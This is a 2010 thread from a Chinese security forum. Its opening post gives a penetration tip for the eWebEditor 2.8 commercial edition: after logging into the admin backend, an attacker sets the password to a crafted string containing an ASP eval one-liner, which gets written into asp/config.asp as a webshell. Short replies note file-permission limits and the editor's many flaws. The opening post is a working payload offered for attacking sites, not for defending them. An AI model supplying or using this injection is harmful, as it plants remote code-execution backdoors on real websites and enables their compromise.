登录注册
下拉
注册
 社区应用最新帖子精华区社区服务会员列表统计排行银行
上一主题下一主题
主题 : eWebEditor=>2.8 商业版 后台一句话木马
使用道具复制链接浏览器收藏打印
hsren在线
出租半张床!赠送床伴!
级别: 管理员

UID: 4
精华: 10
发帖: 4122
安全币: 470558 枚
威望: 9592 点
贡献值: 9554 点
红科币: 65074 枚
好评度: 9624 点
在线时间: 2240(时)
注册时间: 2009-12-21
最后登录: 2010-09-09
楼主 发表于: 2010-07-29 16:09  
倒序阅读   只看楼主  
来源于 共享分类

eWebEditor=>2.8 商业版 后台一句话木马

影响版本:=>2.8 商业版
攻击利用:
登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.


阐述:本文针对ewebeditor商业版本渗透小技巧,个人感觉能进后台可以改样式不必数据库插马了。仅供参考
〓A.K.T〓  刺刀上带着思想 我们是龙的传人
回复 引用
举报顶端
mad在线
级别: 论坛版主
UID: 76
精华: 0
发帖: 18
安全币: 4949 枚
威望: 158 点
贡献值: 168 点
红科币: 407 枚
好评度: 158 点
在线时间: 155(时)
注册时间: 2009-12-22
最后登录: 2010-09-09
沙发 发表于: 2010-07-30 13:22  
只看该作者  
有些config.asp都没有修改权限的 - -
回复 引用
举报顶端
twangel离线
级别: 助理安全工程师
UID: 3667
精华: 0
发帖: 4
安全币: 90 枚
威望: 4 点
贡献值: 4 点
红科币: 10 枚
好评度: 4 点
在线时间: 23(时)
注册时间: 2010-07-29
最后登录: 2010-07-30
板凳 发表于: 2010-07-30 15:17  
只看该作者  
这个编辑器漏洞还是不少
回复 引用
举报顶端
slinkwang离线
级别: 助理安全工程师
UID: 3820
精华: 0
发帖: 12
安全币: 150 枚
威望: 12 点
贡献值: 12 点
红科币: 17 枚
好评度: 12 点
在线时间: 25(时)
注册时间: 2010-08-18
最后登录: 2010-09-07
地板 发表于: 2010-08-19 19:44  
只看该作者  
好多aspconfig都没权限
回复 引用
举报顶端
摩e低调离线
级别: 助理安全工程师
UID: 2447
精华: 0
发帖: 15
安全币: 90 枚
威望: 15 点
贡献值: 15 点
红科币: 20 枚
好评度: 15 点
在线时间: 53(时)
注册时间: 2010-06-03
最后登录: 2010-09-05
4楼 发表于: 2010-08-22 07:52  
只看该作者  
只可以说这程序漏洞太多了
回复 引用
举报顶端
bigstar在线
级别: 助理安全工程师
UID: 3316
精华: 0
发帖: 48
安全币: 414 枚
威望: 52 点
贡献值: 47 点
红科币: 57 枚
好评度: 52 点
在线时间: 659(时)
注册时间: 2010-07-15
最后登录: 2010-09-09
5楼 发表于: 2010-08-22 10:13  
只看该作者  
这个编辑器就是祸害!
回复 引用
举报顶端
上一主题下一主题
 红科网安信息安全团队-〓A.K.T〓 » 安全学堂{Safety class}
描述
快速回复
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
验证问题:
我们的组织是? 正确答案:红科网安
按"Ctrl+Enter"直接提交
上一个下一个